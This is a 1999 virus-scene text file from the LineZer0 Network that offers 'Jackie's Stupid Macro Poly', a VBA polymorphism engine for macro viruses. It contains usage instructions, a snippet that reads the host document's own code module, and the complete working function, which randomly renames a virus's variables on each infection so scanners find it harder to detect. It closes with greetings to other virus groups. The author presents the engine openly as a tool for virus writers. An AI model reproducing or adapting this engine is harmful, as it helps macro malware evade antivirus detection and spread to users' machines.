=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           jackie twoflower presents:

         Jackie's Stupid Macro Poly v1.0
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Hello  folks,  this  is me  and I would like to
present  you my  newest  work,  JSMP  which  is
short  for  Jackie's  Stupid  Macro  Poly. This 
function  exchanges all  your variable-names in 
your viral  code, so all  variables will have a 
different  name   after  every  infection.  ; )

-How to use this shit?

As you see the engine  needs the  viral code to
search for  the variables in it. The engine was
written  for  string  copy  methods for example 
'AddFromString',  etc.  So  I will  give  you a 
simple  piece of  code how to  call the engine.

-[start here]----------------------------------

 OurCode = JSMP(ThisDocument.VBProject _
  .VBComponents(1).CodeModule.Lines(1,12))

-[cut here]------------------------------------

This  piece of cod e will call  our  engine and
save the viral code with the new variable names
into  the string  'OurCode'. To  add  your  own 
variable  names  follow  the  following  steps.

JSMP needs 6 variables  for  itself, so  if you
have  4  variables  you   have  to  change  the 
following  things  in  the engine to the number
'9' .  ( If  you  have   more  variables  just 
change  to  your  correct  number. This example
is   only   in   case   of   4   variables  ! )

1. Make following changes in line 2:

   Dim VARIABLE(0 To 9)

   If you have for example 7 variables you have
   to change it to 12...etc.

2. Add your own variables in line 3:

   VARIABLE(0) = "JSMP" ... VARIABLE(6) = "MyOwnVariable1": VARIABLE(7) = "MyOwnVariable2"...

   Here you must add your own variable names 
   into the array 'VARIABLE'. Just add the
   name of you variables.

3. Increase the loop:

   For VARLOOP = 0 To 9

   You  also have to change the loop for the
   exchange routine. If you have for example
   7 variables change it to 12.


So  I  hope this  is a little  help for  you to
you   this  engine  correctly.   If  you   have
problems  with  it,  feel  free  and  mail  me.

-Conclusion:

This little engine  was written  to help you to
make it  harder to scan your macro. All of this
code  was written  by me.  Feel free  to use it
but  appreciate the  coding of  others and give
credits  for  all  code you  use  from  others.
This  engine  can  be  used  for  all platforms
which  use  VBA.  A  macro  using  this  engine
will  be  out  soon ... hope  so ... seriously!


Have phun,

jackie twoflower /Lz0NT /MVT /CC

[jack.twoflower@disinfo.net]



-[start here]----------------------------------

Private Function JSMP(OurCode)
Dim VARIABLE(0 To 5)
VARIABLE(0) = "JSMP": VARIABLE(1) = "OurCode": VARIABLE(2) = "VARIABLE": VARIABLE(3) = "VARLOOP": VARIABLE(4) = "NEWVAR": VARIABLE(5) = "VARPOS"
For VARLOOP = 0 To 5
VARPOS = 1: NEWVAR = Chr(65 + Int(Rnd * 22)) & Chr(65 + Int(Rnd * 22)) & Int(Rnd * 99) & Int(Rnd * 99)
Do
VARPOS = InStr(VARPOS + 1, OurCode, VARIABLE(VARLOOP))
If VARPOS Then OurCode = Mid(OurCode, 1, (VARPOS - 1)) & NEWVAR & Mid(OurCode, (VARPOS + Len(VARIABLE(VARLOOP))), Len(OurCode))
Loop While VARPOS
Next
JSMP = OurCode
End Function

'Jackie's Stupid Macro Poly v1.0

-[cut here]------------------------------------

-greets fly to the following ppl on earth:

- LineZer0 Network		- We will have a great time!
- Metaphase Virus Team		- When will #2 be out?
- Cybernetic Crew		- Proud to be with you
- Slagehammer			- Thank ya bro! I will send you stuff soon!!!
- Darkman			- How are ya?
- Lord Arz			- Tatata
- F0re				- When will we start?
- Gigabyte			- How is life?
- Black Jack			- WHERE ARE YOU???
- Tally				- Thanks for every stuff 
- VicodinES			- You were a great inspiration. Thanks

- All ppl I forgot this time. Sorry...;( you know who you are!!! 

(c) 99 LineZer0 Network


VISIT - http://lzo.cjb.net - NOW